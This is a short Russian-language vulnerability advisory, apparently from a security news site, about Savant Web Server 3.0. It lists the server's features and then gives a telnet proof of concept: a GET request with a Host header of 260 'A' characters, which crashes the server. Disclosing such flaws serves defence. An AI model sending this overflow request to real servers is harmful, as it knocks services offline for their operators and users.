Savant Web Server обеспечивает поддержку большинства новомодных фишек и технологий, включая:
- Common Gateway Interface (CGI) 1.0 and 1.1
- HTTP 0.9, 1.0, and 1.1 including keep-alive ability
- Comprehensive logging in the standard NCSA format
- User and group management
- Password protection
- Server-side image maps
- Support for over 40 file types, including MP3, RealAudio, and Microsoft Office files
- XML, JavaScript, Java, and ActiveX, and more.

Уязвимость в продукте позволяет вызвать "падение" сервера.

Системы уязвимы:
Savant web server version 3.0

Эксплоит:
Телнет к серверу и пишем следующее:
GET / HTTP/1.1
Host:AAAAAAAAAAAAAAAAAAAA.....
(Где A x 260)

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

    • Открыть комментарии
    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии